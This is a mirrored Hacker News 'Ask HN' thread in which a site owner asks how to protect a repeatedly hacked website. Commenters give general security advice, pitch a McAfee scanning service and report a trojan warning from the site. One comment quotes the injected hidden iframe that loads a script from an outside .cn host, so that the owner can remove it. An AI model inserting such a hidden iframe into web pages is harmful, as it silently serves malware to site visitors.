TE
科技回声
首页24小时热榜最新最佳问答展示工作
GitHubTwitter
首页

科技回声

基于 Next.js 构建的科技新闻平台,提供全球科技新闻和讨论内容。

GitHubTwitter

首页

首页最新最佳问答展示工作

资源链接

HackerNews API原版 HackerNewsNext.js

© 2025 科技回声. 版权所有。

Ask HN: What is the best way to protect your website from hackers?

5 点作者 ujjwalg将近 16 年前
I have a website which was on godaddy servers and got hacked. A warning message used to show up whenever anyone visited the site. I moved the servers to mosso (forwarded from godaddy) and after about a month the website is hacked again and the same warning message has started showing up. I am willing to pay a minimal amount on monthly basis to deal with hacking permanently or do whatever is necessary. Any comments, suggestions, experience will be appreciated. Thanks

6 条评论

kierank将近 16 年前
Remove the following iframe from your homepage:<p><pre><code> &#60;iframe src="http://bestwebfind.cn:8080/ts/in.cgi?pepsi11" width=2 height=4 style="visibility: hidden"&#62;&#60;/iframe&#62;</code></pre>
评论 #628546 未加载
khafra将近 16 年前
As asked, the question has no single answer. Security is a continual process, and a tradeoff with speed, usability, friendliness, bandwidth, etc.<p>The 100% secure website is one without an internet connection. The 99% secure website is one on a continually patched server, offering only static content, and accepting no user-supplied input other than the base url and clicks on links.<p>If you want to accept user input and serve dynamic content, it becomes a complicated process involving, at minimum, awareness of your own vulnerabilities and threats, and protection against the OWASP Top 10 and similar lists.<p>*1. <a href="http://www.owasp.org/index.php/Top_10_2007" rel="nofollow">http://www.owasp.org/index.php/Top_10_2007</a>
评论 #627136 未加载
mg1313将近 16 年前
You might be having problems with your software, not the hosting. If you use a blog read about these security measures: <a href="http://www.mytestbox.com/news/secure-wordpress-blog-prevent-hacking-tips-tricks/" rel="nofollow">http://www.mytestbox.com/news/secure-wordpress-blog-prevent-...</a>
Mistone将近 16 年前
my day job is at McAfee, we sell the leading web security testing service (mcafeesecure.com). Its runs a daily scan on your full website infrastructure, finding the vulnerabilities hackers are exploiting to access your site and showing you how to fix them. It's a solid service, used my 75% of the webs top 500 retailers and thousands of business world wide. If you interested in the service contact me (email in profile).
Mistone将近 16 年前
i clicked through to the site from ujjwalg's profile and my browser crashed immediately. Now I'm getting an endless stream of warning messages from my anti-virus regarding programs trying to access my computer, including a trojan. wow, pretty hectic.<p>the domain is watermelonexpress.com avoid it like the plague
ErrantX将近 16 年前
this suggests the security flaw is with your site code not the hosting provider :)<p>What tech/code does your site run on?